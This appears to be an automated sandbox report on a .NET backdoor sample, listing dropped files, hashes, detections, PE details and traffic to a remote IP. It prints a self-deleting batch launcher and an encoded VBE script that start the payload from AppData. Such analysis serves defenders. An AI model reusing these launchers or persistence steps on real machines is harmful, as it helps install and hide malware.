                                              Preview:PdtYXmmC5tQuxfNe8kAfbhziDkUc4JDtx8N8qyiaI1KKpnXTUHchAw6soLUwSKHwqg7yRPxJCkWkWo3ZNAHxqfsBCfUfdvI8tXdJqiBFTSfZZVV9R4jRDUGKx6ww4RqQcY09Luto9BdY9TmqJUNiL04YRTVtwPKBmP7AeWyhL5SC1sKeUGmjDHEldbr2Y92t0bvuVlLxgqXQi2hjI0Zqmk8fKWgDo6JLDiLZ6aJs4zDXtyCl4IthkMHPdQj8FIIkgMNArImrrrvxhkwWU5IgMll1a55q0Knwqc0glB3vgB02aTr3eNoK9mY5lVkvM61hE8HFtPvSBXAKusaGNCMnfcxDD55PbIjjKTycMmJObWJmmOL25dhJtNBlLDCyUg12xa9b374l
Process: C:\Users\user\AppData\Roaming\Adobe\hui.exe
File Type: ASCII text, with very long lines (390), with no line terminators
Category: dropped
Size (bytes): 390
Entropy (8bit): 5.8092298208441004
Encrypted: false
SSDEEP: 12:7/tTWOgcj4kXBtIRutChvAxuSXUkFSdZ+7yXvHu0WA4z:7FTAkXzI0U2UkFSK7y/Hu0a
MD5: AFFCA6FAF11C0FB75D13964A62505DAA
SHA1: A5E5FA49BC6D651BBD00763054BAF44C87D605B5
SHA-256: FCD95AC92E492DA64789A950A6FB2FF3B1FB5CCA06AAF009796E4084CA98036C
SHA-512: DD264EFB4EEC4DAE9EB1465CB069EA87BF27EDFD31BCCA9A3EFD2C08C7CCDFC8F035BEABD3C48ED1ED6168E867F66AC1CCD2520F1A30F4462B2470337F5542AB
Malicious: false
                                              Preview:XE3thIdxKZoGBXR4LzbObnkfZRdnzVkPeacuOffKkPHfb4jM4Tvsbu6udXUPo07yyYll5gpqURnMfFEesRsgj2yudrR1KPftRTqCS7RXnFYJGuOYS0hXIbP6k1INPyfEv44MYCLuAU2ddootd2iUrIl0DubbzDIzkTYMzBAQoxWxivc6MYtWPKWnSEInku46MC3KPc3c2Rp4wxRSReObUvjZ6u3v2Wq42Zlg2SqufRd8fc1fw0VFfdmacdNfiHjglvCWLva9yd5DRl4e3Y8BAkZYxLDYFLMXr7WtZeTBaWRBhjI1jslKJhgBWojAsB4mRiVUPKFYE7lnSX0OCMyWkBOJbUXv5STYcpu9NylYnMFL62t9xV7gNhCPUM24xTcwoNLmn1
Process: C:\Users\user\AppData\Roaming\Adobe\hui.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 944128
Entropy (8bit): 6.079052617493347
Encrypted: false
SSDEEP: 12288:6r2SWfasLDVGtSOG77ZJ99QxsLKdyfbBsBdB8KYVQ66BrPO9lLeJgNdrgqn4:6avL5BH7pdKk+BSjLeuNVg+4
MD5: 1B46DAD7064609344351AC9EFE3F9AAB
SHA1: 9AA8051F5EF6F800410EC669E52B415B6BF43816
SHA-256: 3BD60F927E3882940077FA527712E5C55A2767564B39A932C4D4941E190A4C81
SHA-512: CE773799E73F0B61A793098DF7A824346EC1D94D16877A272ACE42A644D4FDF7D6A68B4A7C976B4B90471036F0D68B56BBFEC18CFFC68331C32970E7DB7C57C4
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 88%
• Antivirus: Virustotal, Detection: 61%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+Va.....................Z......^)... ...@....@.. ....................................@..................................)..K.......X............................................................................ ............... ..H............text...d.... ...................... ..`.sdata...R...@...T..................@....rsrc...X............b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\PerfLogs\KQihinlofznONtA.exe
File Type: CSV text
Category: dropped
Size (bytes): 1510
Entropy (8bit): 5.380493107040482
Encrypted: false
SSDEEP: 24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
MD5: EC75759911B88E93A2B5947380336033
SHA1: 4D1472BBA520DBF76449567159CD927E94454210
SHA-256: 5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
SHA-512: EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
Malicious: false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
Process: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
File Type: CSV text
Category: dropped
Size (bytes): 1510
Entropy (8bit): 5.380493107040482
Encrypted: false
SSDEEP: 24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
MD5: EC75759911B88E93A2B5947380336033
SHA1: 4D1472BBA520DBF76449567159CD927E94454210
SHA-256: 5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
SHA-512: EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
Malicious: false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
Process: C:\Users\user\AppData\Roaming\Adobe\hui.exe
File Type: CSV text
Category: dropped
Size (bytes): 1969
Entropy (8bit): 5.37489905566343
Encrypted: false
SSDEEP: 48:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/elStHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6o9Zp/elStzHeqKkh2
MD5: 40B0737D9E519BE2FAE92D41EE16B42F
SHA1: 57A1EE0799583C2FDFE12AB3721B872A7B669D97
SHA-256: 3F0A9499BDFBC87F5AE57306FFEEEA7388214D9AD47CB12050A54F7DC64E7625
SHA-512: EF059C601229B4A945A5A29A69802D733A525761B3FDA029D2E9B486F400DA2105A0EA88D0F02A90AED1BA1A2335CB5A122B28A93BF54B6C3D8C6FFE4066B28B
Malicious: false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                              Process:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):25
                                              Entropy (8bit):4.163856189774724
                                              Encrypted:false
                                              SSDEEP:3:jZNxZGkQd:jZjZGj
                                              MD5:247285734A0D7E90672181936B5022B8
                                              SHA1:775EDDEDCFD585DDE08B4920DEFAD10B952EB209
                                              SHA-256:A6DE411F2020850B26180DBF0DEF9A66E26D21A288567D8915350C3A410104A0
                                              SHA-512:23B5372D40EC1BF9DBAB19D217592C8BE7E98960D6646EE826BE8AC000AAD8122F01BCFD08A53D294E9644C515EF99097EDA0FE808482C8AF4403366D96BBB68
                                              Malicious:false
                                              Preview:kUxL4neoB5rkTuThtqGV6Ut5x
                                              Process:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):220
                                              Entropy (8bit):5.139808282350787
                                              Encrypted:false
                                              SSDEEP:6:hCijTg3Nou11r+DE1wknaZ53iyKOZG1wkn23ft3RH:HTg9YDEmrHSoflhH
                                              MD5:9E6FEE868BCC87EB8224D235099753F1
                                              SHA1:795F938BCC02AEC2F168A8888943F73B086B9190
                                              SHA-256:6D8EFD27A03012A3F08B28F4585113007F07442AE844BEA12822667595CD34FA
                                              SHA-512:8FFA3DC7C6E089297097FD3408CE8EFFAF8863EEB6E5361E1331206A134B9E117D6B334F66B8C7765736F88FE9D2ADF846E6E2253341EC779BA14367B7787FB6
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\user\AppData\Roaming\Adobe\hui.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat"
                                              Process:C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):25
                                              Entropy (8bit):3.973660689688185
                                              Encrypted:false
                                              SSDEEP:3:BtuEn:Btrn
                                              MD5:E7F48AA75E0FB6A5FF062767274B118A
                                              SHA1:35708E08C6FD4F4D5B90D205535EAF614F616947
                                              SHA-256:75D94792B854EDF88578815103AE48089E1CB0566C97C86BC3B3ECF5373778D7
                                              SHA-512:85D827E4D81A7612AE78FEDA079F1A82812D7A430643DB6BB3863C3CFE618649EB15B574C367D070C6FC594EBAF1C8ADA66390279C703F7EB88E2C8B9A21ADCB
                                              Malicious:false
                                              Preview:"%AppData%\Adobe\hui.exe"
                                              Process:C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):944128
                                              Entropy (8bit):6.079052617493347
                                              Encrypted:false
                                              SSDEEP:12288:6r2SWfasLDVGtSOG77ZJ99QxsLKdyfbBsBdB8KYVQ66BrPO9lLeJgNdrgqn4:6avL5BH7pdKk+BSjLeuNVg+4
                                              MD5:1B46DAD7064609344351AC9EFE3F9AAB
                                              SHA1:9AA8051F5EF6F800410EC669E52B415B6BF43816
                                              SHA-256:3BD60F927E3882940077FA527712E5C55A2767564B39A932C4D4941E190A4C81
                                              SHA-512:CE773799E73F0B61A793098DF7A824346EC1D94D16877A272ACE42A644D4FDF7D6A68B4A7C976B4B90471036F0D68B56BBFEC18CFFC68331C32970E7DB7C57C4
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 88%
                                               • Antivirus: Virustotal, Detection: 61%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+Va.....................Z......^)... ...@....@.. ....................................@..................................)..K.......X............................................................................ ............... ..H............text...d.... ...................... ..`.sdata...R...@...T..................@....rsrc...X............b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):219
                                              Entropy (8bit):5.878700717848975
                                              Encrypted:false
                                              SSDEEP:6:Gx0wqK+NkLzWbHo18nZNDd3RL1wQJRZ7hqKqTWWaWs:GxFMCzWLo14d3XBJr7EmWc
                                              MD5:70E5D6CDF95E6C8BD3CB92A5F27B41F1
                                              SHA1:2139D28EC203B8E56A4D4B5F35CDC971711EE16B
                                              SHA-256:DDBB5359838904C2276556B9E509443FFECBA2EF2C15C97370F0A0DF01A22A0D
                                              SHA-512:B49E59956FE3B04980C2E9BA174DA14239277B64C15A0D4CEF2AF1976BBAF9C7FEC4A430AFA1C1F56563A9F70B6D6339872BE7DD847597A84B2A52730B399F3D
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Preview:#@~^wgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vGT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zzNK8+J%{YG:0P8Vr7)L9?2s.\qtb29Pw^PtA 4mOJBPTS,0lsd.eTwAAA==^#~@.
                                              Process:C:\Windows\System32\w32tm.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):151
                                              Entropy (8bit):4.869836745797126
                                              Encrypted:false
                                              SSDEEP:3:VLV993J+miJWEoJ8FXI0xcRQYQyXKvoo/F8aNvj:Vx993DEUT0isyX1ot88
                                              MD5:E9A48FF7D67038BD6762681945A74CED
                                              SHA1:58082C32331202700CF59E28CC73527A0B09ACF6
                                              SHA-256:C20E2B860C21DE8D85EB88D3BFF7E07D0F038568C204229858FCB3FC954C1E09
                                              SHA-512:32BFD16D4D01FF1A73893EBC48C57F135788D95F1700E004489EBCBDA183F45F5E1404E9E22B7810EE067AF3E662EAA807D465463B27D4B4319DCF1B011FED50
                                              Malicious:false
                                              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 05/11/2023 15:59:21..15:59:21, error: 0x80072746.15:59:26, error: 0x80072746.
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.27162712266275
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              File size:1'378'916 bytes
                                              MD5:5d329190630c5c051e1b2c4ad4c69abd
                                              SHA1:0227d4e1597ca90477cad5fc3a960f3590457031
                                              SHA256:6974f159cb6e056fd9675ec4ecb6d271a7d6bb69711a295be593091d3bcb9e45
                                              SHA512:0b0f745634bbab4234b0b8b9e5f80c9c99870fe0647afcfa88ffe1990012e9968bcf6f722d7f87c54e6cc7ca566e910a605688e7825a9b82629114f67dae69b9
                                              SSDEEP:24576:O2G/nvxW3WDkIavL5BH7pdKk+BSjLeuNVg+4u:ObA3BI+BH9uB+r
                                              TLSH:4B553A037644CC1AD16A1777C4AFC42013ACBD916631CA1A7AAB7A5B75F23931D0AFCB
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                                              Icon Hash:8eb7b38babb6948c
                                              Entrypoint:0x41ec40
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                                              Instruction
                                              call 00007FA700DA99F9h
                                              jmp 00007FA700DA940Dh
                                              cmp ecx, dword ptr [0043E668h]
                                              jne 00007FA700DA9585h
                                              ret
                                              jmp 00007FA700DA9B7Eh
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ebp
                                              mov ebp, esp
                                              push esi
                                              push dword ptr [ebp+08h]
                                              mov esi, ecx
                                              call 00007FA700D9C317h
                                              mov dword ptr [esi], 00435580h
                                              mov eax, esi
                                              pop esi
                                              pop ebp
                                              retn 0004h
                                              and dword ptr [ecx+04h], 00000000h
                                              mov eax, ecx
                                              and dword ptr [ecx+08h], 00000000h
                                              mov dword ptr [ecx+04h], 00435588h
                                              mov dword ptr [ecx], 00435580h
                                              ret
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              lea eax, dword ptr [ecx+04h]
                                              mov dword ptr [ecx], 00435568h
                                              push eax
                                              call 00007FA700DAC71Dh
                                              pop ecx
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 0Ch
                                              lea ecx, dword ptr [ebp-0Ch]
                                              call 00007FA700D9C2AEh
                                              push 0043B704h
                                              lea eax, dword ptr [ebp-0Ch]
                                              push eax
                                              call 00007FA700DABE32h
                                              int3
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 0Ch
                                              lea ecx, dword ptr [ebp-0Ch]
                                              call 00007FA700DA9524h
                                              push 0043B91Ch
                                              lea eax, dword ptr [ebp-0Ch]
                                              push eax
                                              call 00007FA700DABE15h
                                              int3
                                              jmp 00007FA700DADE63h
                                              jmp dword ptr [00433260h]
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push 00421EB0h
                                              push dword ptr fs:[00000000h]
                                              Programming Language:
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [C++] VS2015 UPD3.1 build 24215
                                              • [EXP] VS2015 UPD3.1 build 24215
                                              • [RES] VS2015 UPD3 build 24213
                                              • [LNK] VS2015 UPD3.1 build 24215
                                               Name | Virtual Address | Virtual Size | Is in Section
                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0x2abe8 | .rsrc
                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8e000 | 0x2268 | .reloc
                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                               Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                               .text | 0x1000 | 0x310ea | 0x31200 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                               .rdata | 0x33000 | 0xa612 | 0xa800 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .data | 0x3e000 | 0x23728 | 0x1000 | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                               .didat | 0x62000 | 0x188 | 0x200 | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                               .rsrc | 0x63000 | 0x2abe8 | 0x2ac00 | False | 0.16787737573099415 | data | 4.177203947247443 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .reloc | 0x8e000 | 0x2268 | 0x2400 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                               PNG | 0x63524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                                               PNG | 0x6406c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                                               RT_ICON | 0x65618 | 0x262a8 | Device independent bitmap graphic, 256 x 296 x 32, image size 151552 | | | 0.10726165498183307
                                               RT_DIALOG | 0x8b8c0 | 0x286 | data | English | United States | 0.5092879256965944
                                               RT_DIALOG | 0x8bb48 | 0x13a | data | English | United States | 0.60828025477707
                                               RT_DIALOG | 0x8bc84 | 0xec | data | English | United States | 0.6991525423728814
                                               RT_DIALOG | 0x8bd70 | 0x12e | data | English | United States | 0.5927152317880795
                                               RT_DIALOG | 0x8bea0 | 0x338 | data | English | United States | 0.45145631067961167
                                               RT_DIALOG | 0x8c1d8 | 0x252 | data | English | United States | 0.5757575757575758
                                               RT_STRING | 0x8c42c | 0x1e2 | data | English | United States | 0.3900414937759336
                                               RT_STRING | 0x8c610 | 0x1cc | data | English | United States | 0.4282608695652174
                                               RT_STRING | 0x8c7dc | 0x1b8 | data | English | United States | 0.45681818181818185
                                               RT_STRING | 0x8c994 | 0x146 | data | English | United States | 0.5153374233128835
                                               RT_STRING | 0x8cadc | 0x446 | data | English | United States | 0.340036563071298
                                               RT_STRING | 0x8cf24 | 0x166 | data | English | United States | 0.49162011173184356
                                               RT_STRING | 0x8d08c | 0x152 | data | English | United States | 0.5059171597633136
                                               RT_STRING | 0x8d1e0 | 0x10a | data | English | United States | 0.49624060150375937
                                               RT_STRING | 0x8d2ec | 0xbc | data | English | United States | 0.6329787234042553
                                               RT_STRING | 0x8d3a8 | 0xd6 | data | English | United States | 0.5747663551401869
                                               RT_GROUP_ICON | 0x8d480 | 0x14 | data | | | 1.2
                                               RT_MANIFEST | 0x8d494 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.39786666666666665
                                               DLL | Import
                                               KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                               gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                                               Language of compilation system | Country where language is spoken
                                               English | United States
                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                               Nov 5, 2023 14:27:06.249264002 CET | 49729 | 80 | 192.168.2.4 | 185.26.122.79
                                               Nov 5, 2023 14:27:06.456414938 CET | 80 | 49729 | 185.26.122.79 | 192.168.2.4
                                               Nov 5, 2023 14:27:06.456778049 CET | 49729 | 80 | 192.168.2.4 | 185.26.122.79
                                               Nov 5, 2023 14:27:06.457415104 CET | 49729 | 80 | 192.168.2.4 | 185.26.122.79
                                               Nov 5, 2023 14:27:06.664361954 CET | 80 | 49729 | 185.26.122.79 | 192.168.2.4
                                               Nov 5, 2023 14:27:06.664421082 CET | 80 | 49729 | 185.26.122.79 | 192.168.2.4
                                               Nov 5, 2023 14:27:06.686235905 CET | 49729 | 80 | 192.168.2.4 | 185.26.122.79
                                               Nov 5, 2023 14:27:06.893672943 CET | 80 | 49729 | 185.26.122.79 | 192.168.2.4
                                               Nov 5, 2023 14:27:06.906579018 CET | 49729 | 80 | 192.168.2.4 | 185.26.122.79
                                               Nov 5, 2023 14:28:23.299822092 CET | 49736 | 80 | 192.168.2.4 | 185.26.122.79
                                               Nov 5, 2023 14:28:23.506558895 CET | 80 | 49736 | 185.26.122.79 | 192.168.2.4
                                               Nov 5, 2023 14:28:23.506655931 CET | 49736 | 80 | 192.168.2.4 | 185.26.122.79
